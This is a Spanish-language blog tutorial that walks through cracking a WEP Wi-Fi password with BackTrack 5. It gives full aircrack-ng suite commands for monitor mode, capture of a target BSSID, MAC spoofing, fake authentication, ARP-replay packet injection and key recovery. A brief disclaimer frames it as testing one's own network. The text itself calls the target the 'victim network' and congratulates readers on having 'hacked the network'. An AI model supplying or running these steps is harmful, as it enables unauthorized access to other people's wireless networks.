Comprobar la seguridad de una red wifi hackeandola.
La siguiente entrada en este blog solo tiene como objeto el comprobar si la clave wifi de nuestra red es lo suficiente segura por lo utilización por lo que no es mi resposabilidad su mala utilización.
Necesitamos:
Una interfaz de red inalámbrica (Wifi).
Tener BackTrack 5
No me digas: y un poco de conocimiento en GNU/Linux (saber usar la Terminal)
Primero vamos a la pagina de descarga de BackTrack 5
BackTrack Download
Escojemos la versión: Yo elegí Backtrack 5 R3
Windows Manager (manejador de vetanas): Yo elegí gnome, ya que para mi es mas cómodo
Escogemos nuestra arquitectura: Mi arquitectura es de 32bits
Tipo de Imagen: ISO (100% Recomendable)
Tipo de descarga: Directo (Descarga Directa)
Backtrack 32 bits 3,3Gb
BackTrack 64 bits 3.1Gb
Booteamos Backtrack 5
USB Mínimo 4 Gb
DVD Mínimo 4.7 Gb
Programa para bootear en una Pendrive podemos usar linuxLiveUSB Home LinuxLiveUsb o UNetbootin Home UNetbootin
1.- Aquí escogerán la distribución a instalar, en este caso es BackTrack 5.
2.- Elegirán la versión de la distribución.
3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5.
4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro.
5.- Selecciona la letra de la unidad.
6.- Esta opción se seleccionara automáticamente al hacer todo bien.
7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria, después de unos minutos el proceso terminara y ya podemos ejecutar el Backtrack 5 desde una Memoria USB.
Programa para bootear en una DVD se puede usar nero u otro
Todos los siguiente pasos se ejecutan en un terminal con privilegios de administrador.
1. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocarla en Modo Monitor, para esto abrimos una terminal y escribimos lo siguiente:
airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0
2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:
airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrán dar cuenta «mon0» es el nombre de la interfaz en modo monitor.
3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando:
airodump-ng mon0
y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c
4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:
airodump-ng -w redes -c 11 –bssid 00:22:A4:30:FE:59 mon0 esto son los datos de la red a a comprobar
donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
–bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0
esto es para Asociar su pc con la Red Víctima
6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:
aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave
7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:
aircrack-ng redes-01.cap
redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3
damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada
Key Found¡……………………
Otra manera pero partiendo de Backtrack 4
Escribimos en la terminal.
airmon-ng
Después de identificada nuestra interfaz hacemos lo siguiente (en mi caso es wlan0), en la misma ventana ponemos
airmon-ng stop wlan0
y después
airmon-ng start wlan0
espués de eso, cambiamos la macaddress de nuetro dispositivo ponemos lo siguiente:
macchanger –m 00:11:22:33:44:55 wlan0
Con lo anterior le cambiamos la macaddress de manera temporal a la USB wireles Linksys WUSB54GC para que sea mas fácil de recordar.
Después de eso en la misma consola ponemos lo siguiente
airodump-ng wlan0
Para escanear las redes que tenemos a nuestro alrededor
Donde vemos lo siguiente (estos datos son imaginarios y pertenecería a la red en la que queremos comprobar sus seguridad). Tenemso que la red es adriana70 y nos fijamos en los siguientes datos el channel (Columna CH) y en la macaddress de nuestra víctima(columna BSSID) estos datos están señalados en la imagen anterior.
Ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos la siguiente instrucción teniendo precaución de sustituir los datos entre comillas con la información de nuestra víctima.
view plaincopy to clipboardprint?
airodump-ng -c «channel» -w guerrix –bssid «mac-a-atacar» wlan0
para el caso de mi víctima quedaría así:
airodump-ng -c 10 -w guerrix –bssid 00:1D:5A:19:05:11 wlan0
Donde “channel” lo sustituí por 10 y “mac-a-atacar” por 00:1D:5A:19:05:11, los datos de la red a coprobar.
El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo siguiente:
Abrimos una nueva terminal sin cerrar la que teníamos, ponemos el siguiente comando teniendo cuidado de sustituir el texto entre comillas con los datos indicados:
view plaincopy to clipboardprint?
aireplay-ng -1 0 -a «mac-a-tacar» -h «mi-mac» wlan0
Recuerden que al principio cambiamos nuestra mac por 00:11:22:33:44:55
aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera teniendo cuidado de sustituir el texto entre comillas con los datos indicados:
view plaincopy to clipboardprint?
aireplay-ng -3 -b «mac-a-tacar» -h «mi-mac» wlan0
En mi caso quedara:
aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0
Al dar enter a esta ultima instrucción notaremos que empezamos a inyectar los paquetes y si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa rápidamente:
Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar las que tenemos abiertas y ponemos lo siguiente:
Nuevamente cuidado de sustituir lo que nos pide.
view plaincopy to clipboardprint?
aircrack-ng -b «mac-a-atacar» guerrix-01.cap
En mi caso quedara así:
aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap
Después de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la red.
Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y así dejen que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en descifrar la clave varia según la dificultad de esta ultima.